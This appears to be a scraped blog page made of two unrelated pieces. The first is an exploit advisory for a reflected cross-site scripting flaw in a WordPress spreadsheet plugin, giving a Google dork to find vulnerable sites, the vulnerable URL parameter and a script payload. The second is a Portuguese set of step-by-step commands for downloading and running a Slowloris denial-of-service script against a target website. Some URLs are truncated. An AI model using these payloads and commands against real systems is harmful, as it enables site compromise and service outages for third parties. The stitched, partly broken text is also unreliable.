Wordpress spreadsheet Plugin Cross site scripting
#********************************************************************************
# Exploit Title : Wordpress spreadsheet Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Software Link : http://downloads.wordpress.org/plugin/dh...et.2.0.zip
#
# Google Dork : inurl :wp-content/plugins/dhtmlxspreadsheet
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Cross site scripting
#
# Location : [Target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss]
#
# Script For Test : <script>alert(1);</script>
######################
# Example:
#
#
http://www.vulnsite.com/wp-content/plugi...(1);</script>
Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos: cd Desktop ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.
Comentários
Postar um comentário